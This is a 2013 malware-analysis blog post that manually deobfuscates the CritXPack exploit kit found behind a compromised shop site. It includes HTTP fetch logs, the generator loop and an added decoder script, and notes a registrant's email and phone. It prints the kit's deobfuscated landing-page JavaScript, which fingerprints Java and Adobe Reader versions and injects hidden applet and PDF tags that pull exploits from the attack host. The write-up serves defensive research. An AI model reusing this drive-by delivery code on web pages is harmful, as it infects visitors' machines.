Some De-obfuscation notes on CritXPack Exploit Kit at root(.)kaovo.com
13 Jan 2013
This is a quick memo of a crusade event, our encounter notes with the CritXPack Exploit Kit. I think this will help others, so I dare to make documentation of the findings here as a guide. This is actually based on my memo, so please bear with the brief & incomplete explanation here and there. Since we are focusing on deobfuscating the malware code manually, I'm sorry that the payload information will not be included in this post (considering that the know-how on the exploit kit's obfuscation is the target; the moronz can change the payload to anything they want anyway).
BTW, here is a capture of the infected(?) site, or rather, I'd say, an INFECTOR site:
[screenshot: capture of the infector site]
The infector site's domain name has Chinese registrant data:
Domain Name: kaovo.com
Registrant Contact:
juxiangpin
xiangpin ju bestpa1@hotmail.com
telephone: +86.02088889929
fax: +86.02088889927
kandung jinyang jinyang kandung 800267
CN
OK. Enough for the teaser, we'll make it quick, so here we go:
#MalwareMustDie!
Starts with the below spam url:
h00p://www.themabbutt.com/index.php?cPath=24
We fetched the index.php:
Resolving www.themabbutt.com... seconds 0.00, 74.200.90.212
Caching www.themabbutt.com => 74.200.90.212
Connecting to www.themabbutt.com|74.200.90.212|:80... seconds 0.00, connected.
:
GET /index.php?cPath=24 HTTP/1.0
User-Agent: MMD Crusader
Host: www.themabbutt.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2013 08:15:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: osCsid=3f7fdcd550948f798d34ba0630c7f8c1; path=/; domain=themabbutt.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
200 OK
Length: unspecified [text/html]
17:15:14 (44.68 KB/s) - `index.php' saved
It has double obfuscation code at the end of the file:
[screenshot: the two obfuscated script blocks at the end of index.php]
↑Both of the obfuscation codes have the same structure as below:
// the obfuscation data (an array of shifted character codes, truncated here):
if(1)
{ f=new Array(9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101,1
105,101,108,99,107,116,114,64,118,84,96,101,75,97,108,99,37,39,97,109,
97,139,88,48,92,39,120,13,8,7,6,105,101,112,94,109,100,112,37,41,58,11,
6,9,124,108,114,99,29,123,12,7,6,9,99,109,96,117,108,99,107,116,45,117,
:
// and the deobfuscation generator code:
// each output character is w[j] + (j % 4); the (031==0x19) test is an
// always-true junk guard (031 is octal 25 == 0x19)
for(i=0;-i+628!=0;i+=1)
{ j=i;
if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));
}
Use the above logic and both obfuscated codes will burp the deobfuscated code below:
[screenshot: the deobfuscated output of both blocks]
The second url will forward you to google, but the first link's url, if we download the source and look inside, contains the suspicious link as per below:
[screenshot: the suspicious link inside the downloaded source]
I fetched it like this (after some "fun" effort receiving 302, we finally received the i.php):
--17:21:10-- h00p://root.kaovo.com/n121212p/awsxd/i.php?token=speed/
=> `i.php@token=speed%2F'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
:
GET /n121212p/awsxd/i.php?token=speed/ HTTP/1.0
Referer: h00p://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader Agent
Host: root.kaovo.com
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
$ ls -alF i.php
-rwx------ xxxx xxxx 2644 Jan 12 21:58 i.php*
MD5: 39583fcb535d2925a5000f4b8deae64a
PS, here's the server's headers:
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
A failed/blocked attempt will redirect you to yandex.ru (its robots.txt, per the Location header):
HTTP/1.1 302 Found
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Location: h00p://www.yandex.ru/robots.txt
Vary: Accept-Encoding
The Landing Page Script
The i.php file contains 2 lines of obfuscated script. It is the landing page of the CritX Exploit Kit. Let's make it a more "viewable" structure :-)
[screenshot: the i.php landing page script, reformatted; the line numbers below refer to it]
With the below explanation:
1. The pd.js is PluginDetect 0.7.9, used to guard the pages of this EK. Unlike the other EKs, it is a separate download and is shared with other infector files.
2. The obfuscated code is found in the script; after the pd.js checks are passed, it runs a packed script as shown in line 9.
3. There is a direct-download infector in line 14, using the meta refresh tag method.
4. The moronz put the variable used for deobfuscation in another part of the script (line 18).
Let's see the PluginDetect used:
--17:30:05-- h00p://root.kaovo.com/n121212p/awsxd/js/pd.js
=> `pd.js'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
:
GET /n121212p/awsxd/js/pd.js HTTP/1.0
Referer: http://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader
Host: root.kaovo.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:29:56 GMT
Content-Type: application/javascript
Content-Length: 28592
Connection: keep-alive
Last-Modified: Thu, 22 Nov 2012 06:59:46 GMT
ETag: "2e0a69-6fb0-4cf1003249c80"
Accept-Ranges: bytes
Vary: Accept-Encoding
:
200 OK
Length: 28,592 (28K) [application/javascript]
17:30:08 (15.12 KB/s) - `pd.js' saved [28592/28592]
This is the inside, a one-line script; hello PluginDetect 0.7.9:
[screenshot: the one-line pd.js source]
Decoding Obfuscation Infector Script
So how to decode the infector part? Let's see the good structure first:
[screenshot: the i.php obfuscation data and generator code, cleaned up]
It is a simple structure: by feeding the generator with the obfuscation data, and eliminating the garbage/unnecessary code, we get the deobfuscated script, saved in the "e" variable, here -->>[PASTEBIN]
Seeing the code, we'll see the infector is aiming to check your Java version (by fetching the result from PluginDetect 0.7.9):
var GfkghfHqFF9 = (PluginDetect.getVersion("Java") + ".").toString().split(".");
if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 7) && (GfkghfHqFF9[3] < 9)){
Y9Nmp1nN7 = 7
}
else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 6) && (GfkghfHqFF9[3] < 33)){
Y9Nmp1nN7 = 6
}
else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] < 6)){
Y9Nmp1nN7 = 5
}
else {
Y9Nmp1nN7 = 0
}
And your PDF reader version (also fetching the result from PluginDetect 0.7.9):
var bqeVOXhTg9n = (PluginDetect.getVersion("AdobeReader") + ".")["toString"]().split(".");
if ((bqeVOXhTg9n[0] == 8) || ((bqeVOXhTg9n[0] == 9) && (bqeVOXhTg9n[1] < 4))){
selJdFtA = 2
}
else {
selJdFtA = 0
}
The return values of 7, 6, 5, 2 and 0 are used to trigger the jar & PDF exploit file downloads, as described in the functions below:
// case of return code zero ---> redirected into YANDEX....
if ((selJdFtA == 0) && (Y9Nmp1nN7 == 0) && (b3RSQGB84 == 0)){
document.location.href = "h00p://root.kaovo.com/n121212p/awsxd/jpfoff.php?token=%64%65%66%61%75%6c%74&"
}
if (Y9Nmp1nN7 == 5){ // case of "5" java exploit download
document.write('
<div style="visibility:hidden">
<applet code="a.Test" archive="j15.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXO5" width="1" height="1">
<param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-tApXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
</applet></div>')
}
if (Y9Nmp1nN7 == 6){ // case of "6" java exploit download
document.write('
<div style="visibility:hidden">
<applet code="a.Test" archive="j16.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYF" width="1" height="1">
<param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-trpXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
</applet></div>')
}
if (Y9Nmp1nN7 == 7){ // case of "7" java exploit download
document.write('
<div style="visibility:hidden">
<applet code="E" archive="j17.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYl" width="1" height="1">
<param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-t1pXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
</applet></div>')
}
if (selJdFtA == 2){ //case of "2" pdf exploit download
document.write('
<div style="visibility:hidden">
<object type="application/pdf" data="lpdf.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYxLk&" width="10" height="10">
</object></div>')}
The point is, three jars and a PDF exploit download are the weapon of the current case of the CritXPack Exploit Kit.
The sample of these infector scripts is here --->>[MEDIAFIRE]
Current infection landing page reference-1 at URLQuery -->>[URLQuery]
Current infection's redirector reference-2 at URLQuery -->>[URLQuery]
More CritXPack reference at Malware don't need Coffee -->>[HERE]
[UPDATED]
*) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @MalwareSigs
*) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @Set_Abominae
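The generator loop quoted in the index.php section (and fed again with the i.php data in the decoding section) reduces to one rule: the j-th output character is w[j] + j % 4, and the (031==0x19) test is an always-true junk guard since octal 031 is 25. The stand-alone decoder below is an added example, not code from the original post; the sample script and the 17-value array prefix it decodes are constructed from the values quoted above, and the regex extraction of the array and modulus is my own addition.

```javascript
// Added example (not from the MalwareMustDie post): decode the CritXPack
// "generator" pattern  s += fromCharCode(1*w[j] + j%4)  without running it.

// Constructed sample: the first 17 values of the obfuscation array quoted in
// the post ("f=new Array(9,8,103,99,32,39,...)"), before the scrape cuts it off.
const PAGE_PREFIX = [9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101];

// Mirror of the generator loop: every index j adds (j % step) to the stored
// code, so the array never contains the real character codes verbatim.
function decodeCritX(w, step = 4) {
  let s = "";
  for (let j = 0; j < w.length; j++) {
    s += String.fromCharCode(w[j] + (j % step));
  }
  return s;
}

// Pull the Array(...) literal and the "j%N" modulus out of a captured script,
// so a fresh sample can be decoded without editing the loop by hand.
// Returns null when the script does not carry this generator shape.
function extractGenerator(script) {
  const arr = /new\s+Array\(([\d,\s]+)\)/.exec(script);
  const mod = /j\s*%\s*(\d+)/.exec(script);
  if (!arr || !mod) return null;
  return {
    data: arr[1].split(",").map(v => parseInt(v.trim(), 10)),
    step: parseInt(mod[1], 10),
  };
}

// Constructed sample in the shape of the post's two blocks: the same data
// array, junk guard and fromCharCode loop (array name f, as in the first block).
const SAMPLE = `if(1)
{ f=new Array(${PAGE_PREFIX.join(",")}); }
for(i=0;-i+${PAGE_PREFIX.length}!=0;i+=1)
{ j=i; if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*f[j]+j%4)); }`;

// Extract and decode in one step; null if the generator pattern is absent.
function decodeSample(script) {
  const g = extractGenerator(script);
  return g ? decodeCritX(g.data, g.step) : null;
}

console.log(JSON.stringify(decodeSample(SAMPLE)));  // "\t\tif (document.ge"
```

The 17 quoted values already decode to the start of the same `if (document.ge...` check the post's screenshot shows, which is a quick way to confirm the modulus before decoding a full capture.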